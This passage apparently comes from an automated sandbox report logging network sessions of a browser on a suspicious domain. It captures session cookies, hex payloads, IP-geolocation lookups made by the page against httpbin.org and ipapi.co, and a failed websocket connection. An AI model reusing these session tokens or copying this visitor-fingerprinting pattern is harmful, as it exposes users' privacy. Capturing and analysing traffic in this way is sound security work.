                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:13:10 UTC31OUTData Raw: 70 61 67 65 6c 69 6e 6b 3d 59 35 66 78 53 44 26 74 79 70 65 3d 39 26 61 70 70 6e 75 6d 3d 31
                                                                                                                                      Data Ascii: pagelink=Y5fxSD&type=9&appnum=1
                                                                                                                                      2024-05-08 18:13:11 UTC1001INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:13:11 GMT
                                                                                                                                      Content-Type: application/json
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, private
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=STR057qVVWN0n5zQW6lwdq3W%2Fnz8HRZTZs37OOJkHEgoQ%2FITweAp9T3OFT55FwVskxRtXuyWims%2FbLeTyT%2BHSxCzqSRLgzfHbSs5PA5H5VzxE7gPvF2I7JnPUEI2%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6IlNXY2lYTkZ1bjFBVVlXZW1rZUZTT1E9PSIsInZhbHVlIjoiOSttem5xem40UnB4U2h3SVJNNTR6WnhndldtWXhGVm1Gem13TkFrS29rKy9vMTJ1eVJ4WE02SEw1VVprcDRuSnVPa0FPNTgvNXdVSGJvVGkxc0l3bmc3NE9OSU5Pd3RGMUQ5WjJTaVdmakFwTHhTeHNiWWFabEN0ci9MOWp3MTUiLCJtYWMiOiIxMWExNTU4NzU4M2MyZjBiY2Q1YTM1Njc4YTY5ZmVhZTk3ZjcyNGYyODc5MDhiZjQ5YzAwYjZhZTc5MjhmMjk0IiwidGFnIjoiIn0%3D; expires=Wed, 08-May-2024 20:13:11 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                      2024-05-08 18:13:11 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 4e 42 55 30 45 31 65 6a 5a 59 55 6e 55 77 61 58 46 4f 65 6d 78 6c 54 57 6f 7a 4f 45 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 51 6d 4a 4d 63 46 56 54 4e 30 34 31 51 54 68 57 59 7a 52 5a 4c 31 4a 31 51 6c 55 32 56 55 45 31 55 32 56 55 62 6b 4e 4f 59 55 4d 72 4c 7a 6c 78 63 32 4e 36 56 6b 63 7a 4d 56 70 6b 63 6d 70 71 51 6b 68 5a 54 56 70 31 61 6e 55 7a 5a 33 4e 46 4d 6e 68 34 63 6c 42 6d 51 55 51 33 57 6b 4e 6f 65 53 39 74 56 6b 46 6b 56 6c 4a 5a 63 6b 63 78 64 6c 4a 6a 57 47 31 69 4d 6e 56 75 54 58 4e 4a 63 45 74 69 4e 31 4e 5a 52 44 56 79 62 53 74 70 62 47 67 33 63 57 46 4c 63 58 64 49 63 7a 5a 55 53 6e 52 6e 64 56 6f 32 52 47 34
                                                                                                                                      Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImNBU0E1ejZYUnUwaXFOemxlTWozOEE9PSIsInZhbHVlIjoiQmJMcFVTN041QThWYzRZL1J1QlU2VUE1U2VUbkNOYUMrLzlxc2N6VkczMVpkcmpqQkhZTVp1anUzZ3NFMnh4clBmQUQ3WkNoeS9tVkFkVlJZckcxdlJjWG1iMnVuTXNJcEtiN1NZRDVybStpbGg3cWFLcXdIczZUSnRndVo2RG4
                                                                                                                                      2024-05-08 18:13:11 UTC26INData Raw: 31 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 7d 0d 0a
                                                                                                                                      Data Ascii: 14{"status":"success"}
                                                                                                                                      2024-05-08 18:13:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      72192.168.2.164979454.160.164.2094435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:13:11 UTC646OUTGET /ip HTTP/1.1
                                                                                                                                      Host: httpbin.org
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:13:11 UTC277INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:13:11 GMT
                                                                                                                                      Content-Type: application/json
                                                                                                                                      Content-Length: 31
                                                                                                                                      Connection: close
                                                                                                                                      Server: gunicorn/19.9.0
                                                                                                                                      Access-Control-Allow-Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                      2024-05-08 18:13:11 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 31 2e 31 38 31 2e 36 30 2e 39 32 22 0a 7d 0a
                                                                                                                                      Data Ascii: { "origin": "81.181.60.92"}


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      73192.168.2.1649795104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:13:12 UTC1135OUTGET /qzgXe6GTtpy9MQNktQ1m82zcabjeVXbE6XxvQzPom7 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IlNXY2lYTkZ1bjFBVVlXZW1rZUZTT1E9PSIsInZhbHVlIjoiOSttem5xem40UnB4U2h3SVJNNTR6WnhndldtWXhGVm1Gem13TkFrS29rKy9vMTJ1eVJ4WE02SEw1VVprcDRuSnVPa0FPNTgvNXdVSGJvVGkxc0l3bmc3NE9OSU5Pd3RGMUQ5WjJTaVdmakFwTHhTeHNiWWFabEN0ci9MOWp3MTUiLCJtYWMiOiIxMWExNTU4NzU4M2MyZjBiY2Q1YTM1Njc4YTY5ZmVhZTk3ZjcyNGYyODc5MDhiZjQ5YzAwYjZhZTc5MjhmMjk0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImNBU0E1ejZYUnUwaXFOemxlTWozOEE9PSIsInZhbHVlIjoiQmJMcFVTN041QThWYzRZL1J1QlU2VUE1U2VUbkNOYUMrLzlxc2N6VkczMVpkcmpqQkhZTVp1anUzZ3NFMnh4clBmQUQ3WkNoeS9tVkFkVlJZckcxdlJjWG1iMnVuTXNJcEtiN1NZRDVybStpbGg3cWFLcXdIczZUSnRndVo2RG4iLCJtYWMiOiI0YTZmYmY5NWExZmQ0NmQ4NmQyMTYyMmUyNWFhNmIwNmFjYTZhYmRjMjBhZmI2YzIzNjA1ZGI1MTRiOTVhNjYxIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:13:12 UTC581INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Wed, 08 May 2024 18:13:12 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xyBwLunhQ%2ByYlfUN34F22uFBH7Cd2HYf63gShBn2iZoqpSmykB7uA4XxYIwHAjOw7i2oAIT4%2BlHi8bSlPYjMFbcAk5PCyRFj%2FUEvwhhQjuBYmicNsxfv6HuIV%2BJeQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6c1fe922c74d-SEA
                                                                                                                                      2024-05-08 18:13:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      74192.168.2.1649796172.67.69.2264435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:13:12 UTC616OUTGET /81.181.60.92/json/ HTTP/1.1
                                                                                                                                      Host: ipapi.co
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:13:12 UTC750INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:13:12 GMT
                                                                                                                                      Content-Type: application/json
                                                                                                                                      Content-Length: 778
                                                                                                                                      Connection: close
                                                                                                                                      Allow: OPTIONS, POST, GET, HEAD, OPTIONS
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      Vary: Host, origin
                                                                                                                                      access-control-allow-origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1nbWoEd2MCruNee8WbVck564KELECoHqdkRmqb8AHoXS72tQ8%2B3ASEt1mjiMd5w3a2Ks%2FL6ytbevNzzWNeykwsFtdvrs9JzI6ppd%2Bd7haUfJudx%2FpNn0hZU4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6c1fceab9353-SEA
                                                                                                                                      2024-05-08 18:13:12 UTC619INData Raw: 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 31 2e 31 38 31 2e 36 30 2e 39 32 22 2c 0a 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 31 2e 31 38 31 2e 36 30 2e 30 2f 32 34 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 53 65 61 74 74 6c 65 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 20 22 57 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72
                                                                                                                                      Data Ascii: { "ip": "81.181.60.92", "network": "81.181.60.0/24", "version": "IPv4", "city": "Seattle", "region": "Washington", "region_code": "WA", "country": "US", "country_name": "United States", "country_code": "US", "countr
                                                                                                                                      2024-05-08 18:13:12 UTC159INData Raw: 20 20 22 6c 61 6e 67 75 61 67 65 73 22 3a 20 22 65 6e 2d 55 53 2c 65 73 2d 55 53 2c 68 61 77 2c 66 72 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 61 72 65 61 22 3a 20 39 36 32 39 30 39 31 2e 30 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 70 6f 70 75 6c 61 74 69 6f 6e 22 3a 20 33 32 37 31 36 37 34 33 34 2c 0a 20 20 20 20 22 61 73 6e 22 3a 20 22 41 53 32 31 32 32 33 38 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 0a 7d
                                                                                                                                      Data Ascii: "languages": "en-US,es-US,haw,fr", "country_area": 9629091.0, "country_population": 327167434, "asn": "AS212238", "org": "Datacamp Limited"}


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      75192.168.2.16497973.231.248.1004435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:13:12 UTC337OUTGET /ip HTTP/1.1
                                                                                                                                      Host: httpbin.org
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:13:12 UTC224INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:13:12 GMT
                                                                                                                                      Content-Type: application/json
                                                                                                                                      Content-Length: 31
                                                                                                                                      Connection: close
                                                                                                                                      Server: gunicorn/19.9.0
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                      2024-05-08 18:13:12 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 31 2e 31 38 31 2e 36 30 2e 39 32 22 0a 7d 0a
                                                                                                                                      Data Ascii: { "origin": "81.181.60.92"}


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      76192.168.2.1649798104.26.9.444435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:13:13 UTC350OUTGET /81.181.60.92/json/ HTTP/1.1
                                                                                                                                      Host: ipapi.co
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:13:13 UTC669INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:13:13 GMT
                                                                                                                                      Content-Type: application/json
                                                                                                                                      Content-Length: 778
                                                                                                                                      Connection: close
                                                                                                                                      Allow: OPTIONS, GET, HEAD, POST, OPTIONS
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      Vary: Host, origin
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1eJmuZUOp9VQVhE58n%2B3q3A28GYTuLuuHqSxDU4WBZywJSLTjrOB%2BbCXfAMF1uzOqgz%2F%2F7a%2FudLYo51VW1T5fvxcHp6QQ0dK%2BsUwHih6ycVYkUux9KHfTuWA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6c253bc37567-SEA
                                                                                                                                      2024-05-08 18:13:13 UTC700INData Raw: 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 31 2e 31 38 31 2e 36 30 2e 39 32 22 2c 0a 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 31 2e 31 38 31 2e 36 30 2e 30 2f 32 34 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 53 65 61 74 74 6c 65 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 20 22 57 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72
                                                                                                                                      Data Ascii: { "ip": "81.181.60.92", "network": "81.181.60.0/24", "version": "IPv4", "city": "Seattle", "region": "Washington", "region_code": "WA", "country": "US", "country_name": "United States", "country_code": "US", "countr
                                                                                                                                      2024-05-08 18:13:13 UTC78INData Raw: 70 6f 70 75 6c 61 74 69 6f 6e 22 3a 20 33 32 37 31 36 37 34 33 34 2c 0a 20 20 20 20 22 61 73 6e 22 3a 20 22 41 53 32 31 32 32 33 38 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 0a 7d
                                                                                                                                      Data Ascii: population": 327167434, "asn": "AS212238", "org": "Datacamp Limited"}


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      77192.168.2.1649799104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:13:22 UTC1345OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: Upgrade
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Upgrade: websocket
                                                                                                                                      Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Sec-WebSocket-Version: 13
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IlNXY2lYTkZ1bjFBVVlXZW1rZUZTT1E9PSIsInZhbHVlIjoiOSttem5xem40UnB4U2h3SVJNNTR6WnhndldtWXhGVm1Gem13TkFrS29rKy9vMTJ1eVJ4WE02SEw1VVprcDRuSnVPa0FPNTgvNXdVSGJvVGkxc0l3bmc3NE9OSU5Pd3RGMUQ5WjJTaVdmakFwTHhTeHNiWWFabEN0ci9MOWp3MTUiLCJtYWMiOiIxMWExNTU4NzU4M2MyZjBiY2Q1YTM1Njc4YTY5ZmVhZTk3ZjcyNGYyODc5MDhiZjQ5YzAwYjZhZTc5MjhmMjk0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImNBU0E1ejZYUnUwaXFOemxlTWozOEE9PSIsInZhbHVlIjoiQmJMcFVTN041QThWYzRZL1J1QlU2VUE1U2VUbkNOYUMrLzlxc2N6VkczMVpkcmpqQkhZTVp1anUzZ3NFMnh4clBmQUQ3WkNoeS9tVkFkVlJZckcxdlJjWG1iMnVuTXNJcEtiN1NZRDVybStpbGg3cWFLcXdIczZUSnRndVo2RG4iLCJtYWMiOiI0YTZmYmY5NWExZmQ0NmQ4NmQyMTYyMmUyNWFhNmIwNmFjYTZhYmRjMjBhZmI2YzIzNjA1ZGI1MTRiOTVhNjYxIiwidGFnIjoiIn0%3D
                                                                                                                                      Sec-WebSocket-Key: jnoCLA/AeacloZYUGfcd/Q==
                                                                                                                                      Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                      2024-05-08 18:13:23 UTC609INHTTP/1.1 400 Bad Request
                                                                                                                                      Date: Wed, 08 May 2024 18:13:23 GMT
                                                                                                                                      Content-Type: application/json
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LoM%2BCGGs4TENRGr80f4YJ5jkJGj5hclDkpHqC2tDYcpRDoTzI6Te7fXqT3AQPvu1OSuSu384jILl2nYlDSWRYN5bPJ9YTTayCRZS693jGKtrtBeHFEP6YU9MsbOAArtlaYBkVLTuain6qnJ5cXoRk4IV4fQfYBwBLw7ROdG5ymfu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6c628e7cc594-SEA
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-05-08 18:13:23 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                                                                                                      Data Ascii: 22{"code":3,"message":"Bad request"}
                                                                                                                                      2024-05-08 18:13:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      78192.168.2.164980235.190.80.14435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:13:36 UTC567OUTOPTIONS /report/v4?s=xyBwLunhQ%2ByYlfUN34F22uFBH7Cd2HYf63gShBn2iZoqpSmykB7uA4XxYIwHAjOw7i2oAIT4%2BlHi8bSlPYjMFbcAk5PCyRFj%2FUEvwhhQjuBYmicNsxfv6HuIV%2BJeQQ%3D%3D HTTP/1.1
                                                                                                                                      Host: a.nel.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Access-Control-Request-Method: POST
                                                                                                                                      Access-Control-Request-Headers: content-type
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:13:37 UTC336INHTTP/1.1 200 OK
                                                                                                                                      content-length: 0
                                                                                                                                      access-control-max-age: 86400
                                                                                                                                      access-control-allow-methods: OPTIONS, POST
                                                                                                                                      access-control-allow-origin: *
                                                                                                                                      access-control-allow-headers: content-type, content-length
                                                                                                                                      date: Wed, 08 May 2024 18:13:37 GMT
                                                                                                                                      Via: 1.1 google
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      79192.168.2.164980335.190.80.14435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:13:37 UTC479OUTPOST /report/v4?s=xyBwLunhQ%2ByYlfUN34F22uFBH7Cd2HYf63gShBn2iZoqpSmykB7uA4XxYIwHAjOw7i2oAIT4%2BlHi8bSlPYjMFbcAk5PCyRFj%2FUEvwhhQjuBYmicNsxfv6HuIV%2BJeQQ%3D%3D HTTP/1.1
                                                                                                                                      Host: a.nel.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Content-Length: 1376
                                                                                                                                      Content-Type: application/reports+json
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
